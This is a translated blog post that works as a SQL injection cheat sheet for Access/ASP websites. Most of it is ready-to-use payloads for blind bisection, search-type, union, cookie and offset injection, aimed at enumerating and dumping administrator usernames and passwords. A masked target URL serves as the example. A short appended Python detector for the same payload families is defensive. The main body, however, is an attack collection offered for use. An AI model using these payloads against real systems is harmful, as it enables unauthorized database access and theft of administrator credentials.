
Injection Statements Explained (GET injection, cookie injection, search-type injection, etc.)

Author: 喀拉峻
  • March 3, 2022
  • Length: 1941 characters

Note: for an ordinary GET injection against a string-typed parameter, prepend ' and append and ''='.

Bisection (boolean-blind) method

and exists (select * from MSysAccessObjects)

This checks whether the back end is an Access database; MSysAccessObjects is a default Access system table.

and exists (select * from admin)
and exists (select id from admin)
and exists (select id from admin where id=1)
and exists (select id from admin where id>1)

Then test id>1: if the page still returns normally, there is more than one ID. Then use id<50 to narrow down the range.

and exists (select username from admin)
and exists (select password from admin)
and exists (select id from admin where len(username)<10 and id=1)
and exists (select id from admin where len(username)>5 and id=1)
and exists (select id from admin where len(username)=6 and id=1)
and exists (select id from admin where len(password)<10 and id=1)
and exists (select id from admin where len(password)>5 and id=1)
and exists (select id from admin where len(password)=7 and id=1)
and (select top 1 asc(mid(username,1,1)) from admin)=97

If the page returns normally, the first character of the first username has ASCII code 97, i.e. a. To guess the second character, change username,1,1 to username,2,1. To guess the password, replace username with password.

Search-type injection

%' and 1=1 and '%'='
%' and exists (select * from admin) and '%'='
%' and exists(select id from admin where id=1) and '%'='
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='

Search-type injection is nothing special either: prepend %' and append and '%'='. For an MSSQL back end, the trailing and '%'=' can be replaced with --. One more point: search-type injection can also use union statements.

Union query

order by 10
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1

Very simple. One thing to point out: where id=1 is used when dumping the administrator with ID=1, and where id=2 dumps the administrator with ID=2. Without the where id=1 restriction you should get the first administrator. (Note that the administrator's id is not necessarily 1; it might be 100!)

Cookie injection

http://www.******.com/shownews.asp?id=127
http://www.******.com/shownews.asp
alert(document.cookie="id="+escape("127"));
alert(document.cookie="id="+escape("127 and 1=1"));
alert(document.cookie="id="+escape("127 order by 10"));
alert(document.cookie="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
alert(document.cookie="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));

These should not need any explanation; the statements speak for themselves. A union query is used here again; you could swap in the bisection method just as well, but that is not really suitable for a normal person, since someone once died of exhaustion doing it that way.

Offset injection

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on a.id=d.id)
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
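As an added defender-side example (not code from the original post), here is a small Python detector that URL-decodes a request's query string and Cookie header and flags the payload families described above: the MSysAccessObjects fingerprint, the and exists(select ...) bisection probes, asc(mid(...)) character guessing, order by / union select probes, and the %' ... '%'=' search wrapper. The signature names and the sample requests are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the Access/ASP injection families described on this page.
# Names are chosen for this example, not taken from any product.
PATTERNS = {
    "access_fingerprint": re.compile(r"msysaccessobjects", re.I),
    "boolean_blind":      re.compile(r"\band\s+exists\s*\(\s*select\b", re.I),
    "char_guess":         re.compile(r"asc\s*\(\s*mid\s*\(", re.I),
    "union_probe":        re.compile(r"\border\s+by\s+\d+\b|\bunion\s+select\b", re.I),
    "search_wrapper":     re.compile(r"%'\s*and\b.*'%'\s*=\s*'", re.I),
}

def normalise(value: str) -> str:
    """Repeatedly URL-decode and lowercase, so a payload wrapped with escape()
    in a cookie (or double-encoded) matches the same signatures as in a URL."""
    prev, cur = None, value
    while prev != cur:
        prev, cur = cur, unquote_plus(cur)
    return cur.lower()

def classify(request_target: str, cookie: str = "") -> dict:
    """Return {signature_name: source} for each signature that fires; source is
    'query' or 'cookie', since cookie injection moves the payload out of the URL."""
    hits = {}
    for source, raw in (("query", request_target), ("cookie", cookie)):
        text = normalise(raw)
        for name, rx in PATTERNS.items():
            if name not in hits and rx.search(text):
                hits[name] = source
    return hits

# Constructed sample requests (request target, Cookie header); not real traffic.
SAMPLES = [
    ("/shownews.asp?id=127", ""),
    ("/shownews.asp?id=127%20and%20exists%20(select%20*%20from%20MSysAccessObjects)", ""),
    ("/shownews.asp?id=127%20and%20(select%20top%201%20asc(mid(username,1,1))%20from%20admin)=97", ""),
    ("/search.asp?key=a%25%27%20and%201=1%20and%20%27%25%27=%27", ""),
    ("/shownews.asp", "id=127%20and%201%3D2%20union%20select%201%2Cusername%2Cpassword%2C4%20from%20admin"),
]

def scan(samples=SAMPLES):
    """Classify every sample; one result dict per request."""
    return [classify(target, cookie) for target, cookie in samples]

if __name__ == "__main__":
    for (target, cookie), hits in zip(SAMPLES, scan()):
        print(target, cookie, "->", hits or "clean")
```

Because the Cookie header is decoded and checked with the same signatures as the query string, the cookie-injection variant does not evade a rule that only looked at the URL.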

Published on the InfoQ Writing Platform, Network Security section.